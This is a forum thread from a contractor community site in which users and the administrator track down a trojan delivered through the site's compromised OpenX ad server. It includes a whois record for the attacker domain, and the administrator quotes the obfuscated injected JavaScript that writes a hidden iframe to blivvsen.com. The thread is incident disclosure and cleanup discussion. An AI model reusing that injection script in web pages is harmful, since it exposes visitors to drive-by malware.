• Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
  • Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!
Collapse

You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:

  • You are not logged in. If you are already registered, fill in the form below to log in, or follow the "Sign Up" link to register a new account.
  • You may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
  • If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.

Previously on "Trojan from blivvsen com"

Collapse

  • NickFitz
    replied
    Originally posted by Zippy View Post
    Anyhoo if you daffodils are listening, I do my super-secret stuff on one of our other machines.
    I know, I've seen it

    Leave a comment:


  • Zippy
    replied
    Originally posted by minestrone View Post
    Yup, small dialog I never noiced on the screen "unable to open sex.avi" (was remoting into the machine)

    Anyway, I just don't think what they tried will work, unless you have been mucking about with the plugin security setting and did not know what you were doing, they might get a few first year CS student I suppose (or a few Bobs )
    I did see three little windows which looked a bit like the default player installed on this machine (which I never use). They disappeared when I started killing unrecognised processes. Also manually removed cookies.

    So does the congregation think the intention was to sell us some low-grade porn?

    Anyhoo if you daffodils are listening, I do my super-secret stuff on one of our other machines.

    Leave a comment:


  • minestrone
    replied
    Originally posted by minestrone View Post
    I noticed the java plugin kick off last night and was not sure why, machine is still on in the house.

    It's fully patched and up to date with windows security essentials though, should be fine.
    Yup, small dialog I never noiced on the screen "unable to open sex.avi" (was remoting into the machine)

    Anyway, I just don't think what they tried will work, unless you have been mucking about with the plugin security setting and did not know what you were doing, they might get a few first year CS student I suppose (or a few Bobs )

    Leave a comment:


  • Zippy
    replied
    A deep scan suggests I got away with it too - nothing was detected.

    Leave a comment:


  • administrator
    replied
    Good stuff, glad no-one so far seems to have been hit badly with it. Must say, as Trojans go it was a bit of a wimpy one. Luckily. Will certainly be keeping on top on OpenX updates. Seen quite a few sites over the last few days hit with it so if you have any unpatched sites running OpenX then sort it quickly!

    Leave a comment:


  • minestrone
    replied
    I noticed the java plugin kick off last night and was not sure why, machine is still on in the house.

    It's fully patched and up to date with windows security essentials though, should be fine.

    Leave a comment:


  • Sockpuppet
    replied
    NOD32 went ape tulip last night and kept blocking bilsen url. Just ran a scan and nothing so pretty happy.

    Leave a comment:


  • administrator
    replied
    Originally posted by cojak View Post
    Should this affect us daywalkers?
    No, is all cleaned up now. Software definitely up to date.

    Originally posted by d000hg View Post
    I don't remember what time I was on CUK last night. Any chance admin might be able to find a list of logged-in users in the danger period and contact them all - other users might have made an infrequent visit and not see this thread.

    Is this trojan browser-specific? And I assume it targets Windows alone?
    Will see if can pull a list of logged in users when I get into work.

    I would have thought Windows specific...

    Leave a comment:


  • d000hg
    replied
    I don't remember what time I was on CUK last night. Any chance admin might be able to find a list of logged-in users in the danger period and contact them all - other users might have made an infrequent visit and not see this thread.

    Is this trojan browser-specific? And I assume it targets Windows alone?

    Leave a comment:


  • cojak
    replied
    Should this affect us daywalkers?
    Last edited by cojak; 21 September 2010, 06:55. Reason: Just seen admin's sticky, so that's a no.

    Leave a comment:


  • NickFitz
    replied
    Just checked with an HTTP debugger and, even when I allow the ads through, nothing untoward is showing up now

    Of note is that, when searching for blivvsen.com, this thread is currently the only content that appears on a Google search except for some robot that tracks new domain registrations.

    The whois record for that domain is:

    Code:
    Domain blivvsen.com
    
    Date Registered: 2010-9-16
    Date Modified: 2010-9-17
    Expiry Date: 2011-9-16
    
    DNS1: ns1.blivvsen.com
    DNS2: ns2.blivvsen.com
    
    Registrant
        Private Whois Service
        Private Whois Service  [email protected]
        *******PLEASE DO NOT SEND LETTERS******
        ****Contact the owner by email only****
        c/o blivvsen.com
        N4892 Nassau
        Bahamas
    
    Administrative Contact
        Private Whois Service
        Private Whois Service  [email protected]
        *******PLEASE DO NOT SEND LETTERS******
        ****Contact the owner by email only****
        c/o blivvsen.com
        N4892 Nassau
        Bahamas
        Tel: +852.81720004
    
    Technical Contact
        Private Whois Service
        Private Whois Service  [email protected]
        *******PLEASE DO NOT SEND LETTERS******
        ****Contact the owner by email only****
        c/o blivvsen.com
        N4892 Nassau
        Bahamas
        Tel: +852.81720004
    
    Registrar: Internet.bs Corp.
    Registrar's Website : <a 
    href='http://www.internetbs.net/'>http://www.internetbs.net/</a>
    "Registrar: Internet.bs Corp"... lots of BS from their end, it seems
    Last edited by NickFitz; 21 September 2010, 02:11.

    Leave a comment:


  • administrator
    replied
    Originally posted by Zippy View Post
    Don't worry. If the little bastard has got me I'll sort it.
    Someone else I owe drinks to at the next meet up then

    Originally posted by blacjac View Post
    Nice one administrator
    I don't feel particularly clever at the minute, should have turned the ad server off as soon as people started complaining. I did upgrade the adserver last night but not to the most recent.

    Code:
    root@cukmain:~/openx/20100919# ls -al
    total 159984
    drwxr-xr-x  3 root root      4096 Sep 19 22:18 .
    drwxr-xr-x  6 root root      4096 Sep 21 01:39 ..
    -rw-r--r--  1 root root 154185110 Sep 19 21:59 cukopenx.sql
    drwxr-xr-x 10  500  500      4096 Sep 19 22:04 openx-2.8.0
    -rw-r--r--  1 root root   9452354 Apr 29  2009 openx-2.8.0.tar.gz
    I have just had a look around the OpenX site and can't see where I could have downloaded that version of the software from. Think must have been a link in the control panel, just upgraded and moved on to the next site. Got distracted though as the next site I went to patch had already been had.

    Still, at least no-one else will get had when the forum and main site (adserver covers the main site too) gets busier in the morning.

    Thanks to you all for letting me know and helping track it down. Apologies again to the infected, hope it is no more than an AV clean up job for you and no system rebuilds needed...

    Leave a comment:


  • blacjac
    replied
    Nice one administrator

    Leave a comment:


  • Zippy
    replied
    Originally posted by administrator View Post
    Send me the invoice if you have to pay for it...

    I did the free trial of Kaspersky as Owlhoot said it was warning him of problems, they do a free trial Did the updates and quick scan showing nothing and full scan showing no problems so far either.

    Pig tulip. Found the problem. Is the adserver:

    Code:
    <script language="JavaScript">var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') <= 0 && dc.cookie.indexOf('1=o') > 0){\
    function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}\
    if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;}\
    if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\\"text/javascript\\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\\"http://blivvsen. com/shuffle/index.php?s=IBB@G\\" ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'\\"></ifra'+'me>');");dc.writeln("//--><\\/script>");} var run=1;\
    date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}</script>
    The append table of the adserver is full of this but don't understand why this wasn't showing in the source when I was viewing it. Maybe as it had tried to infect me but browser was beyond the hack so it then hid it from me?

    Sorry all, very disappointed with myself for not spotting sooner.
    Don't worry. If the little bastard has got me I'll sort it.

    Leave a comment:


  • administrator
    replied
    Originally posted by blacjac View Post
    No probs, but why can't I seem to get my screenshot to work inline?
    Might have inline images on this forum turned off. Will check once sorted the adserver DB out.

    Leave a comment:

Working...
X